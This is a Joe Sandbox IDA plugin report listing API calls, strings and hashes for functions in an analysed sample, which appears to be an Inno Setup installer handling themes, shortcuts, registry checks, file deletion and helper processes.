                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                            • API String ID: 1968650500-2910565190
                                                                                            • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                            • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041CA40
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                            • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                            • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                            • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                            • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                            • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                            • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                            • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                            • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                            • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                            • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 269503290-0
                                                                                            • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                            • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                            Strings
                                                                                            • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                            • IPersistFile::Save, xrefs: 00456962
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                            • {pf32}\, xrefs: 0045671E
                                                                                            • CoCreateInstance, xrefs: 004566AF
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                            • IPropertyStore::Commit, xrefs: 004568E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                            • API String ID: 308859552-2363233914
                                                                                            • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                            • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                            • API String ID: 2000705611-3672972446
                                                                                            • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                            • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                            • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                              • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                            • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                            APIs
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                            • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                            • GetDC.USER32(00000000), ref: 0041B402
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                            • String ID:
                                                                                            • API String ID: 644427674-0
                                                                                            • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                            • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                            • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                            Strings
                                                                                            • RegOpenKeyEx, xrefs: 00454910
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                            • , xrefs: 004548FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                            • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                            APIs
                                                                                              • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                            Strings
                                                                                            • .NET Framework not found, xrefs: 0045961D
                                                                                            • v2.0.50727, xrefs: 0045955B
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                            • v1.1.4322, xrefs: 004595C2
                                                                                            • .NET Framework version %s not found, xrefs: 00459609
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                            • v4.0.30319, xrefs: 004594F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                            • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                            Strings
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                            • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Strings
                                                                                            • , xrefs: 004545B1
